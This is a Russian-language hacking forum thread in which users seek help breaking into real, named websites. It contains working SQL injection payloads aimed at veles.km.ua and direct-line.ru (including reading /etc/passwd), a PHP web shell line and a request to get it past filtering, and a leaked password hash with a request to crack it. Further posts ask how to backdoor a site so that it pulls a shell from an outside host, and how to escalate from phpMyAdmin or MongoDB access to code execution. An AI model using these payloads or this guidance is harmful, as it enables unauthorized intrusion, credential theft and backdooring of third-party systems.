Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    все стандартно, методом перебора интересных названий таблиц. Только скулю другую нашел, с выводом
     
    Waki likes this.
  2. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    в папке etc есть файлы
    13107206.passwd
    13240132.passwd
    diraccess
    система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64
    В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа
    384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q.
    как я понял первое пользователь второе пароль в хеше, я правельно понял?
    И как расшифровать этот хеш или подменить!
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это md5(Unix). cmd5.ru
     
    _________________________
  4. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Очень печально но его там нет( можете помочь расшифровать?
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    https://forum.antichat.ru/forums/76/ здесь тебе возможно помогут!
     
    _________________________
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    так если можете изменять файл, подмените пароль или вовсе удалите.
     
    _________________________
  7. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "<? system($_GET['c']); ?>" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как "<!--? system([c]); ?-->"
    Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим.
    Добавлю, код <?php phpinfo(); ?> исполняется нормально :)
     
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Возможно сервер блокирует system используй другие. либо в ЛС отпиши, В общем решаемо.
     
  9. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Кто знает есть подробности об этой уязвимости. Есть ли эксплойты? по интернету ничего не нашел, уязвимость вроде критическая.

    nginx SPDY heap buffer overflow

    Описание:
    A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file
     
    SaNDER likes this.
  10. masanya

    masanya New Member

    Joined:
    8 Oct 2015
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    есть phpMyAdmin 2.11.11.3 Documentation, не получаеться взломать phpmyadmin, уже перепробовал все что есть в сети
    кто может помочь?
     
    Alaich likes this.
  11. dexspace

    dexspace New Member

    Joined:
    4 Oct 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    http://www.veles.km.ua/'"
    выдаёт
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
    query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
    query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
    query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;
    сайт уязвим, но havij не может выдрать имя базы.
    сейчас сканю sqlmap
    есть идеи?
     
  12. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Руки рулят :)
    Code:
    http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)  --+
     
    Br@!ns and dexspace like this.
  13. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
    Вопрос:
    1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
    2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
    Спасибо.
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется.
    2. Только путем чтения конфигов (https://rdot.org/forum/showthread.php?t=741) или вариант выше
     
    _________________________
  15. -0x00-

    -0x00- New Member

    Joined:
    19 Aug 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Доброе время суток.
    Я конечно повторяюсь, но потерял тему с этим вопросом.
    Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://php.net/manual/ru/function.file-put-contents.php
     
    _________________________
    K800 likes this.
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Вы наверное про эту тему? https://forum.antichat.ru/threads/307894/ - Не стандартные способы заливки шеллов
     
    _________________________
  18. Alaich

    Alaich Member

    Joined:
    16 Oct 2015
    Messages:
    28
    Likes Received:
    13
    Reputations:
    7
    Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ?
    Подключаюсь через Robomongo
     
  19. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    Доброго времени суток
    Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
    на примере уязвимости:
    Code:
    http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
    каким образом можно раскрыть абсолютный путь сайта ?
    к примеру все файлы из etc читаются.
    а как перейти к файлу httpd.conf
    или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
    большое спасибо
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://wiki.apache.org/httpd/DistrosDefaultLayout Изучи данный материал в помощь.



    Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
     
    aldemko likes this.